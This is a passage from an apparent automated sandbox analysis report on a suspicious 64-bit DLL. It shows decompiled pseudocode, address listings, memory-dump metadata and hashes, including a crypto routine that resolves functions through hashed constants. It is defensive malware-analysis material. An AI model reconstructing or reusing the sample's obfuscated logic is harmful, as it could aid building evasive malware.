				_t756 =  *0x13124140; // 0x0
				 *(_t756 + (8 + _t755 * 4) * 4) =  *(_t756 + (8 + _t755 * 4) * 4) | 0x00000d72;
				_t495 =  *0x13124148; // 0x0
				_t812 =  &(_t811[2]);
				 *(_t947 + 0x140) = _t812;
				_t612 =  *0x13124194; // 0x0
				 *((intOrPtr*)(_t973 +  *_t811 * 8)) = _t612 + 0xbde +  *((intOrPtr*)(_t953 + (_t495 + 7) * 8));
				 *_t812 =  *_t812 - 1;
				r8d =  *0x13124148; // 0x0
				_t914 =  *0x13124150; // 0x0
				 *((long long*)(_t947 + 0x48)) = 0x4df;
				_t893 =  *0x131241a0; // 0x0
				_t994 =  *(_t973 + _t953 * 4 * 4) ^ _t953 * 0x00000004;
				 *0x131241a0 = _t893 - 1;
				_t103 = _t953 + 4; // 0x4
				r9d =  *( *((intOrPtr*)(_t947 + 0x180)) + _t103 * 2) & 0x0000ffff;
				r9d = 0xf46;
				 *(_t947 + 0x40) = 0x183e / r9d;
				 *(_t947 + 0x38) =  *0x13124168;
				 *(_t947 + 0x30) = _t994;
				 *(_t947 + 0x28) = (_t914 - _t892 >> 1) + _t892 >> 0xb;
				 *(_t947 + 0x20) =  *( *(_t947 + 0xb0) +  *(_t947 + 0x170) * 4) ^ 0x000010ea;
				_t508 = E00007FFC7FFC130E1520(0x183e / r9d, _t812,  *((intOrPtr*)(__r9 + 0x94 +  *_t812 * 4)),  *(_t947 + 0x170) * 0x18f8, _t973);
				r15d = r12d;
				_t919 =  *((intOrPtr*)(_t947 + 0x88));
				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x98)))) + _t919 + 3)) = _t508;
				_t509 =  *0x13124168; // 0x0
				_t510 = _t509 + 3;
				if (r12d -  *((intOrPtr*)(0x1581 + _t510 * 4)) > 0) goto 0x1310026a;
				r11d =  *(_t947 + 0x64) & 0x0000ffff;
				r9d = _t1004 + _t1004;
				r8d = _t1004 * 4;
				 *(_t947 + 0x70) = _t994;
				 *(_t947 + 0x160) = r9d;
				 *(_t947 + 0x140) = r8d;
				_t763 =  *0x13124140; // 0x0
				_t1017 = r15d;
				 *(_t947 + 0x68) =  *(_t947 + 0x68) + ( *(_t763 + 0x14 + (_t1004 + _t1004 * 2) * 4) & 0x000016a9);
				_t765 =  *0x131241a0; // 0x0
				_t842 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t765 * 8)) +  *0x13124180;
				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + r8d * 8)) + _t842;
				 *(_t812 + _t1017 * 8) =  *(_t812 + _t1017 * 8) | _t1017;
				 *((short*)(0x1ae1 + _t1017 * 2)) = _t510 / _t842;
				_t955 =  *0x13124150; // 0x0
				 *0x13124150 = _t955 - 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1004 * 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t1017 * 4)) < 0) goto 0x130fffbc;
				_t767 =  *0x13124160; // 0x0
				_t897 = r9d;
				if ( *((intOrPtr*)(_t897 + _t919)) == 0xa0) goto 0x130fffbc;
				_t669 =  *0x13124148; // 0x0
				if (_t669 - ( *0x13124120 & 0x0000ffff) < 0) goto 0x130fffbc;
				_t974 =  *(_t947 + 0x170);
				_t161 = _t897 + 6; // 0x6
				if ( *((intOrPtr*)(_t974 + _t161 * 2)) != ( *0x13124133 & 0x000000ff)) goto 0x130fffbc;
				r8w = r8w -  *0x1312414c;
				_t845 = 3 + _t897 * 4;
				r8w = r8w -  *(_t974 + _t845 * 2);
				 *(_t974 + _t845 * 2) = r8w;
				asm("cdq");
				 *(_t1010 + _t1017 * 8) = _t897;
				 *0x13124150 = _t767;
				 *((char*)(_t919 +  *_t812)) = 0xa0;
				 *((long long*)( *_t812 * 8 + _t1010)) =  *((intOrPtr*)(_t947 + 0x138));
				r10d =  *0x13124148; // 0x0
				_t813 =  &(_t812[2]);
				_t772 =  *0x13124128; // 0x0
				_t941 =  *0x13124150; // 0x0
				r10d = r10d - 1;
				_t774 = r10d;
				 *0x13124148 = r10d;
				r10d =  *( *(_t947 + 0x170) + _t774 * 2) & 0x0000ffff;
				r10d = r10d - 0x1002;
				 *(_t947 + 0x40) = _t774;
				 *(_t947 + 0x38) = r10d;
				 *(_t947 + 0x30) = 0;
				 *(_t947 + 0x28) = _t994 + _t941;
				 *(_t947 + 0x20) = ( *( *(_t947 + 0xc0) +  *_t813 * 2) & 0x0000ffff) - 0xbd5;
				_t531 = E00007FFC7FFC130E37F0(_t603, ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa) + ((0xb70fbb5b * r10d >> 0x20) + r10d >> 0xa >> 0x1f), _t813, _t1017, _t941,  *(_t772 +  *_t812 * 4) * 0x1310);
				_t996 =  *(_t947 + 0x70);
				 *0x13124168 = _t531;
				goto 0x13100218;
				_t222 = _t1023 + 3; // 0x4
				r13d = _t222;
				_t776 =  *0x13124140; // 0x0
				_t777 =  *((intOrPtr*)(_t947 + 0xa0));
				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + r13d * 8)) + ( *(_t776 +  *_t813 * 4) | _t996);
				r9d =  *0x1312416c & 0x0000ffff;
				_t853 =  *0x13124160; // 0x0
				r9w = r9w + 0xffff;
				 *0x1312416c = r9w;
				_t901 =  *_t813;
				_t814 = _t813 - 8;
				r8d =  *(_t901 + _t853) & 0x000000ff;
				r8b = r8b + r15b;
				 *(_t853 +  *((intOrPtr*)(_t947 + 0x88))) = r8b;
				if (( *(_t947 + 0x60) & 0x000000ff) - 0x1977 > 0) goto 0x13100213;
				_t731 = _t996 -  *0x13124180; // 0x0
				if (_t731 != 0) goto 0x13100213;
				 *(_t947 + 0x50) = _t1017;
				 *((char*)(_t947 + 0x48)) = 0x55;
				 *_t777 =  *_t777 - 1;
				 *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) =  *((long long*)( *((intOrPtr*)(_t947 + 0x98)) + 0x20 + _t777 * 8)) + 0x1970;
				_t250 = _t1010 + 0xa; // 0xe
				 *( *0x13124148 + 0x578) = ( *0x13124132 & 0x000000ff) % ( *( *0x13124148 + 0x578) & 0x000000ff);
				_t683 =  *0x13124148; // 0x0
				_t984 =  *0x13124158; // 0x0
				_t778 =  *0x13124138; // 0x0
				 *0x13124148 = _t683 + 1;
				_t254 = _t901 + 1; // 0x2
				_t902 =  *0x13124128; // 0x0
				_t257 = _t1010 - 2; // 0x2
				 *0x13124148 = _t254;
				_t780 =  *0x13124170; // 0x0
				_t781 = _t780 + 1;
				 *0x13124170 = _t781;
				_t782 =  *0x131241a8; // 0x0
				r11d =  *( *_t814 + _t782 + 1) & 0x000000ff;
				_t783 =  *0x131241a0; // 0x0
				_t784 = _t783 + 1;
				 *0x13124158 = _t984 + 1;
				 *0x131241a0 = _t784;
				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017;
				r9d = 0xdc;
				 *(_t947 + 0x38) = r10d;
				 *(_t947 + 0x30) = _t996;
				 *(_t947 + 0x28) = 0x55;
				 *(_t947 + 0x20) =  *( *((intOrPtr*)(_t947 + 0x78)) + _t781 * 8);
				_t543 = E00007FFC7FFC130E42A0( *((intOrPtr*)(_t778 + _t250 * 8)), _t814,  *((intOrPtr*)(_t902 + _t254 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t784 * 8)) + _t1017);
				_t904 =  *((intOrPtr*)(_t947 + 0x180));
				 *(_t947 + 0x40) = _t1017;
				 *((short*)(_t904 + 6 +  *_t814 * 2)) = _t543;
				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x80)) + 0x1278)) -  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x148)) +  *_t814 * 4)) - r15d;
				_t862 =  *0x13124160; // 0x0
				r8d =  *(_t1017 + _t862) & 0x000000ff;
				 *(_t947 + 0x38) = _t862;
				 *(_t947 + 0x30) = _t904;
				 *(_t947 + 0x28) = 0x171;
				 *(_t947 + 0x20) =  *((intOrPtr*)(_t902 + _t257 * 4));
				_t548 = E00007FFC7FFC130E37F0(_t603, 0x1994, _t814, _t862, _t904, _t1017);
				_t295 = _t1010 + 0x13; // 0x17
				_t922 =  *((intOrPtr*)(_t947 + 0x88));
				_t935 =  *((intOrPtr*)(_t947 + 0x98));
				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t295 * 4)) = _t548;
				_t1011 =  *((intOrPtr*)(_t947 + 0x78));
				r8d =  *(_t947 + 0x140);
				r15d = r15d + 1;
				r9d =  *(_t947 + 0x160);
				r8d = r8d + 4;
				_t549 =  *0x13124168; // 0x0
				r9d = r9d + 2;
				 *(_t947 + 0x140) = r8d;
				 *(_t947 + 0x160) = r9d;
				if (r15d -  *((intOrPtr*)(0x1581 + (_t549 + 3) * 4)) <= 0) goto 0x130ffd80;
				 *(_t947 + 0x70) = _t777;
				 *(_t947 + 0x140) = _t814;
				_t717 =  *( *((intOrPtr*)(_t947 + 0xa0)) +  *_t814 * 2) & 0x0000ffff;
				_t733 = _t935 -  *0x13124150; // 0x0
				if (_t733 > 0) goto 0x13100475;
				r14d = _t935 * 4;
				 *((long long*)((_t935 + 4) * 8 + _t1011)) =  *0x13124148 * 0xcea + _t717 -  *((intOrPtr*)((_t935 + 4) * 8 + _t1011));
				_t979 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x130)) + _t922 * 4));
				_t791 =  *((intOrPtr*)(_t947 + 0x158));
				r8d =  *(_t922 + _t791) & 0x000000ff;
				_t553 =  *0x13124168; // 0x0
				 *0x13124168 = _t553 - 1;
				_t792 =  *0x131241a0; // 0x0
				_t793 = _t792 - 1;
				 *0x131241a0 = _t793;
				_t794 =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xa8)) + _t793 * 8));
				 *(_t947 + 0x40) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + _t794 * 4));
				 *(_t947 + 0x38) = 0x2f3;
				 *(_t947 + 0x30) =  *(_t947 + 0x68) + _t794;
				 *(_t947 + 0x28) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t791 * 4)) - _t717;
				 *(_t947 + 0x20) = _t922;
				_t557 = E00007FFC7FFC130E37F0(_t603, 0x1994,  *((intOrPtr*)(_t947 + 0x178)), _t922,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + _t922 * 8)), _t1017 ^  *0x13124180);
				r9d = 0x1581;
				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + (_t941 + 1) * 4)) = _t557;
				_t795 = r14d;
				 *(_t947 + 0x90) =  *(_t947 + 0x90) ^  *( *((intOrPtr*)(_t947 + 0x148)) + _t795 * 4);
				 *((intOrPtr*)(_t795 +  *((intOrPtr*)(_t947 + 0x158)))) = sil;
				_t563 = 0x11fa / ( *(_t947 + 0x64) & 0x0000ffff);
				 *(_t947 + 0x64) = _t563;
				_t641 =  *0x13124168; // 0x0
				 *(( *_t979 + 8) * 8 + _t1011) =  *(( *_t979 + 8) * 8 + _t1011) | _t641 + 0x00001a88;
				_t910 =  *_t979;
				_t874 =  *0x13124178; // 0x0
				 *((short*)(_t874 + _t910 * 2)) = _t563 / _t874;
				 *_t979 =  *_t979 - 1;
				 *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) =  *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) ^ 0x00000eb3;
				r8d =  *0x13124123 & 0x000000ff;
				r8b = r8b + 1;
				_t924 = _t717 + 1;
				r14d = r14d + 4;
				 *0x13124123 = r8b;
				 *0x1312416c =  *0x1312416c & r8d - ((r8d - (0x4f6fddef * r8d >> 0x00000020) >> 0x00000001) + (0x4f6fddef * r8d >> 0x00000020) >> 0x0000000c) * 0x0000186c;
				_t734 = _t924 -  *0x13124150; // 0x0
				if (_t734 <= 0) goto 0x131002b0;
				_t816 =  *(_t947 + 0x140);
				_t1007 =  *(_t947 + 0x70);
				_t695 =  *0x13124148; // 0x0
				_t1012 =  *((intOrPtr*)(_t947 + 0x148));
				_t382 = _t910 + 0x25; // 0x25
				_t798 =  *0x13124188; // 0x0
				r8d =  *(_t798 + _t382 * 4);
				r8d = r8d - _t695;
				r8d = r8d - (((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc) + ((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc >> 0x1f)) * 0x1a8b;
				 *0x1312414c = r8d;
				 *_t816 =  *_t816 + 1;
				asm("cdq");
				 *( *((intOrPtr*)(_t947 + 0x150)) +  *0x1312414c * 4) =  *(_t1012 + 0x20 +  *_t816 * 4) /  *( *((intOrPtr*)(_t947 + 0x150)) +  *0x1312414c * 4);
				_t879 =  *0x131241a0; // 0x0
				r9d =  *(_t879 +  *((intOrPtr*)(_t947 + 0x88))) & 0x000000ff;
				_t880 =  *0x13124178; // 0x0
				_t582 =  *0x1312414c; // 0x0
				_t583 = _t582 + 1;
				r9d = r9d ^  *(_t880 + 0x560) & 0x0000ffff;
				 *0x1312414c = _t583;
				 *0x13124123 = 0xa0;
				_t719 = ( *0x13124123 & 0x000000ff) + 0x00000001 & 0x000000ff;
				 *0x1312416c = ( *0x1312416c & 0x0000ffff) + 1;
				_t881 = _t583;
				_t803 =  *0x13124188; // 0x0
				r8d =  *(_t803 + _t881 * 4);
				r8d = r8d - (((0xd62b80d7 * r8d >> 0x20) + r8d >> 7) + ((0xd62b80d7 * r8d >> 0x20) + r8d >> 7 >> 0x1f)) * 0x99;
				r10d = ( *0x1001 & 0x000000ff) * 0xcdd;
				_t591 =  *0x30ca - 0xbd8;
				 *(_t947 + 0x50) = _t881 ^ 0x0000172c;
				 *((char*)(_t947 + 0x48)) = _t591 - 0x10;
				 *(_t947 + 0x40) = _t591;
				 *(_t947 + 0x38) = r10d;
				 *(_t947 + 0x30) = r8d;
				 *(_t947 + 0x28) = _t717 + 1;
				 *(_t947 + 0x20) = _t719;
				r8d = 0x17c2;
				 *((intOrPtr*)( *(_t947 + 0xb0) + _t1007 * 4)) = E00007FFC7FFC130E42A0(r14d, _t816,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + 0x6b30)), _t979);
				_t936 =  *((intOrPtr*)(0x407 + _t1007 * 4));
				if (_t719 - ( *0x13124120 & 0x0000ffff) < 0) goto 0x13100705;
				_t806 =  *0x13124158; // 0x0
				_t807 =  *0x131241a0; // 0x0
				asm("cdq");
				 *(_t947 + 0x40) = _t807 | 0x00000021;
				 *(_t947 + 0x38) = ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) /  *(_t1012 + 0x53ec);
				 *(_t947 + 0x30) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + 0x64 + _t806 * 4)) - 0x16a8;
				 *(_t947 + 0x28) =  *(0x1581 + _t936 * 4) & _t719;
				 *(_t947 + 0x20) = 0x2bcc;
				 *0x13124168 = E00007FFC7FFC130E37F0(_t603, ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) %  *(_t1012 + 0x53ec), _t816, _t719, _t717 + 0x00000001 ^ 0x000002eb, 0xfffff944);
				 *((long long*)( *((intOrPtr*)(_t947 + 0x80)) + _t936 * 8 + 8 - 8)) =  *_t816;
				if (_t719 + 1 - ( *0x13124120 & 0x0000ffff) >= 0) goto 0x13100641;
				return  *0x13124130 & 0x0000ffff;
			}
















































































































                                0x7ffc130ff8f0
                                0x7ffc130ff8f0
                                0x7ffc130ff8f5
                                0x7ffc130ff8fa
                                0x7ffc130ff905
                                0x7ffc130ff90b
                                0x7ffc130ff912
                                0x7ffc130ff919
                                0x7ffc130ff91c
                                0x7ffc130ff924
                                0x7ffc130ff927
                                0x7ffc130ff92f
                                0x7ffc130ff932
                                0x7ffc130ff941
                                0x7ffc130ff94a
                                0x7ffc130ff94e
                                0x7ffc130ff956
                                0x7ffc130ff95d
                                0x7ffc130ff963
                                0x7ffc130ff96e
                                0x7ffc130ff975
                                0x7ffc130ff97d
                                0x7ffc130ff980
                                0x7ffc130ff984
                                0x7ffc130ff988
                                0x7ffc130ff98c
                                0x7ffc130ff99e
                                0x7ffc130ff9a6
                                0x7ffc130ff9b2
                                0x7ffc130ff9c9
                                0x7ffc130ff9d1
                                0x7ffc130ff9d8
                                0x7ffc130ff9db
                                0x7ffc130ff9eb
                                0x7ffc130ff9f2
                                0x7ffc130ffa01
                                0x7ffc130ffa05
                                0x7ffc130ffa0f
                                0x7ffc130ffa17
                                0x7ffc130ffa1e
                                0x7ffc130ffa25
                                0x7ffc130ffa2e
                                0x7ffc130ffa3e
                                0x7ffc130ffa46
                                0x7ffc130ffa4d
                                0x7ffc130ffa58
                                0x7ffc130ffa5d
                                0x7ffc130ffa63
                                0x7ffc130ffa6a
                                0x7ffc130ffa81
                                0x7ffc130ffa98
                                0x7ffc130ffaa2
                                0x7ffc130ffaac
                                0x7ffc130ffab9
                                0x7ffc130ffac9
                                0x7ffc130ffadd
                                0x7ffc130ffae6
                                0x7ffc130ffaf3
                                0x7ffc130ffaff
                                0x7ffc130ffb40
                                0x7ffc130ffb4a
                                0x7ffc130ffb5f
                                0x7ffc130ffb64
                                0x7ffc130ffb69
                                0x7ffc130ffb6e
                                0x7ffc130ffb72
                                0x7ffc130ffb77
                                0x7ffc130ffb80
                                0x7ffc130ffb88
                                0x7ffc130ffb8d
                                0x7ffc130ffb9d
                                0x7ffc130ffba5
                                0x7ffc130ffbab
                                0x7ffc130ffbb7
                                0x7ffc130ffbba
                                0x7ffc130ffbc1
                                0x7ffc130ffbce
                                0x7ffc130ffbe0
                                0x7ffc130ffbe7
                                0x7ffc130ffbee
                                0x7ffc130ffbfd
                                0x7ffc130ffc01
                                0x7ffc130ffc0d
                                0x7ffc130ffc1b
                                0x7ffc130ffc1f
                                0x7ffc130ffc25
                                0x7ffc130ffc6c
                                0x7ffc130ffc8f
                                0x7ffc130ffcab
                                0x7ffc130ffcc1
                                0x7ffc130ffcc4
                                0x7ffc130ffccb
                                0x7ffc130ffcdf
                                0x7ffc130ffcec
                                0x7ffc130ffcf8
                                0x7ffc130ffcff
                                0x7ffc130ffd04
                                0x7ffc130ffd09
                                0x7ffc130ffd0e
                                0x7ffc130ffd13
                                0x7ffc130ffd20
                                0x7ffc130ffd23
                                0x7ffc130ffd2e
                                0x7ffc130ffd32
                                0x7ffc130ffd38
                                0x7ffc130ffd46
                                0x7ffc130ffd4c
                                0x7ffc130ffd52
                                0x7ffc130ffd5e
                                0x7ffc130ffd66
                                0x7ffc130ffd6b
                                0x7ffc130ffd73
                                0x7ffc130ffd80
                                0x7ffc130ffd8b
                                0x7ffc130ffda0
                                0x7ffc130ffdab
                                0x7ffc130ffdb6
                                0x7ffc130ffdbd
                                0x7ffc130ffdc2
                                0x7ffc130ffde1
                                0x7ffc130ffdea
                                0x7ffc130ffdf4
                                0x7ffc130ffe03
                                0x7ffc130ffe09
                                0x7ffc130ffe10
                                0x7ffc130ffe1d
                                0x7ffc130ffe2a
                                0x7ffc130ffe32
                                0x7ffc130ffe38
                                0x7ffc130ffe40
                                0x7ffc130ffe52
                                0x7ffc130ffe58
                                0x7ffc130ffe67
                                0x7ffc130ffe6a
                                0x7ffc130ffe6f
                                0x7ffc130ffe85
                                0x7ffc130ffe91
                                0x7ffc130ffe9f
                                0x7ffc130ffeb9
                                0x7ffc130ffed8
                                0x7ffc130ffedc
                                0x7ffc130ffee6
                                0x7ffc130ffeea
                                0x7ffc130ffef1
                                0x7ffc130fff14
                                0x7ffc130fff44
                                0x7ffc130fff52
                                0x7ffc130fff59
                                0x7ffc130fff68
                                0x7ffc130fff6f
                                0x7ffc130fff77
                                0x7ffc130fff7c
                                0x7ffc130fff85
                                0x7ffc130fff8a
                                0x7ffc130fff8f
                                0x7ffc130fff94
                                0x7ffc130fffb1
                                0x7ffc130fffb7
                                0x7ffc130fffc4
                                0x7ffc130fffc4
                                0x7ffc130fffd2
                                0x7ffc130fffdd
                                0x7ffc130fffe8
                                0x7ffc130fffed
                                0x7ffc130ffff5
                                0x7ffc13100014
                                0x7ffc13100018
                                0x7ffc13100020
                                0x7ffc13100023
                                0x7ffc13100027
                                0x7ffc13100030
                                0x7ffc13100033
                                0x7ffc13100042
                                0x7ffc13100048
                                0x7ffc1310004f
                                0x7ffc13100057
                                0x7ffc13100061
                                0x7ffc13100066
                                0x7ffc1310006b
                                0x7ffc1310008c
                                0x7ffc13100090
                                0x7ffc13100097
                                0x7ffc1310009d
                                0x7ffc131000ac
                                0x7ffc131000b3
                                0x7ffc131000bc
                                0x7ffc131000bf
                                0x7ffc131000cd
                                0x7ffc131000d1
                                0x7ffc131000da
                                0x7ffc131000e1
                                0x7ffc131000f0
                                0x7ffc131000fd
                                0x7ffc13100104
                                0x7ffc1310010a
                                0x7ffc13100119
                                0x7ffc1310011c
                                0x7ffc13100123
                                0x7ffc13100133
                                0x7ffc13100138
                                0x7ffc1310013e
                                0x7ffc13100143
                                0x7ffc13100148
                                0x7ffc13100151
                                0x7ffc13100155
                                0x7ffc1310015d
                                0x7ffc13100165
                                0x7ffc1310016a
                                0x7ffc13100193
                                0x7ffc131001a4
                                0x7ffc131001b5
                                0x7ffc131001c1
                                0x7ffc131001cb
                                0x7ffc131001d5
                                0x7ffc131001de
                                0x7ffc131001e6
                                0x7ffc131001f3
                                0x7ffc131001fc
                                0x7ffc13100204
                                0x7ffc1310020f
                                0x7ffc13100213
                                0x7ffc13100218
                                0x7ffc13100220
                                0x7ffc13100223
                                0x7ffc1310022b
                                0x7ffc1310022f
                                0x7ffc13100235
                                0x7ffc1310023c
                                0x7ffc13100247
                                0x7ffc13100257
                                0x7ffc1310025d
                                0x7ffc13100262
                                0x7ffc13100275
                                0x7ffc13100279
                                0x7ffc13100282
                                0x7ffc1310028d
                                0x7ffc131002d6
                                0x7ffc131002da
                                0x7ffc131002e2
                                0x7ffc131002ea
                                0x7ffc131002ef
                                0x7ffc131002fe
                                0x7ffc13100309
                                0x7ffc13100315
                                0x7ffc13100320
                                0x7ffc13100327
                                0x7ffc1310033f
                                0x7ffc13100347
                                0x7ffc13100350
                                0x7ffc13100355
                                0x7ffc1310035a
                                0x7ffc1310035f
                                0x7ffc13100372
                                0x7ffc13100380
                                0x7ffc13100385
                                0x7ffc13100391
                                0x7ffc131003a4
                                0x7ffc131003ad
                                0x7ffc131003b5
                                0x7ffc131003c4
                                0x7ffc131003d3
                                0x7ffc131003d7
                                0x7ffc131003da
                                0x7ffc13100405
                                0x7ffc13100409
                                0x7ffc1310040f
                                0x7ffc13100418
                                0x7ffc13100434
                                0x7ffc13100439
                                0x7ffc13100447
                                0x7ffc1310044b
                                0x7ffc13100454
                                0x7ffc1310045b
                                0x7ffc13100462
                                0x7ffc13100468
                                0x7ffc13100470
                                0x7ffc13100475
                                0x7ffc1310047b
                                0x7ffc1310048b
                                0x7ffc13100491
                                0x7ffc13100498
                                0x7ffc131004a1
                                0x7ffc131004ba
                                0x7ffc131004bd
                                0x7ffc131004c4
                                0x7ffc131004de
                                0x7ffc131004e5
                                0x7ffc13100509
                                0x7ffc1310051b
                                0x7ffc13100520
                                0x7ffc13100527
                                0x7ffc1310052d
                                0x7ffc1310053d
                                0x7ffc13100540
                                0x7ffc13100548
                                0x7ffc1310054e
                                0x7ffc1310055b
                                0x7ffc13100565
                                0x7ffc13100568
                                0x7ffc1310056f
                                0x7ffc1310058e
                                0x7ffc13100599
                                0x7ffc131005a7
                                0x7ffc131005cf
                                0x7ffc131005d6
                                0x7ffc131005da
                                0x7ffc131005df
                                0x7ffc131005e4
                                0x7ffc131005e9
                                0x7ffc131005ee
                                0x7ffc131005f2
                                0x7ffc1310060b
                                0x7ffc1310060f
                                0x7ffc13100620
                                0x7ffc13100641
                                0x7ffc1310066b
                                0x7ffc1310068a
                                0x7ffc131006a0
                                0x7ffc131006a5
                                0x7ffc131006b1
                                0x7ffc131006b6
                                0x7ffc131006bb
                                0x7ffc131006d5
                                0x7ffc131006f2
                                0x7ffc131006ff
                                0x7ffc1310071f

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: U$U
                                • API String ID: 0-2145350036
                                • Opcode ID: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                                • Instruction ID: 960e417c59998a92ec72f836dffbbce2702af9e3497f9adaf9267ca9766af117
                                • Opcode Fuzzy Hash: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                                • Instruction Fuzzy Hash: B3829372608E9985E720CF16E8903B977B0F799B99F214136DA8DA3764DF3CE121CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F6808 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ExceptionRaise_clrfp
                                • String ID:
                                • API String ID: 15204871-0
                                • Opcode ID: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                                • Instruction ID: 38b9f5f747c578af9fbafce340fe61ab291b3e16afba41b8a2a7b6a147c08bcd
                                • Opcode Fuzzy Hash: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                                • Instruction Fuzzy Hash: C3B17973604B988BEB15CF29CD463687BE4F784B6CF188961DA9D837A4CB39D461CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C3CD8 Relevance: 2.7, Strings: 2, Instructions: 174COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00000201201640C3CD8(intOrPtr __ecx, long long __rbx, void* __rdx, long long __rdi, void* __r9, long long __r12, intOrPtr _a8, long long* _a40, void* _a48, intOrPtr _a56) {
				void* _v24;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v88;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				char _t62;
				long long* _t123;
				long long* _t124;
				void* _t156;
				long long* _t157;
				void* _t166;
				void* _t168;
				void* _t172;

				_t123 = _t157;
				 *((long long*)(_t123 + 0x10)) = __rbx;
				 *((long long*)(_t123 + 0x18)) = __rdi;
				 *((long long*)(_t123 + 0x20)) = __r12;
				 *((intOrPtr*)(_t123 + 8)) = __ecx;
				_t154 =  *0x640cd458;
				r13d = r8d;
				E00000201201640C908C(0x4e1c2e77, _t123,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t123 == 0) goto 0x640c3d36;
				r9d = 0x18;
				r8d = 0;
				_v120 = 0xf0000040;
				 *_t123(_t172, _t168, _t166);
				goto 0x640c3d38;
				if (0 == 0) goto 0x640c3f1a;
				r8d = _a56;
				_t11 =  &_v80; // 0xfb849f3f
				if (E00000201201640C7E40(__rbx, _v72, _t156, _t11) != 0) goto 0x640c3efc;
				_t13 = _t123 + 0x10; // 0x10
				r8d = _t13;
				E00000201201640C487A();
				E00000201201640C908C(0xd74cfe41, _t123,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t123 == 0) goto 0x640c3da1;
				r9d = 0;
				 *_t123();
				goto 0x640c3da3;
				if (0 != 0) goto 0x640c3dcd;
				E00000201201640C908C(0xc06f8334, _t123,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t123 == 0) goto 0x640c3dc0;
				 *_t123();
				goto 0x640c3dc5;
				if (0x7f != 0) goto 0x640c3efc;
				r12d = 0;
				_t62 =  >  ? 0x10 : r13d;
				r8d = _t62;
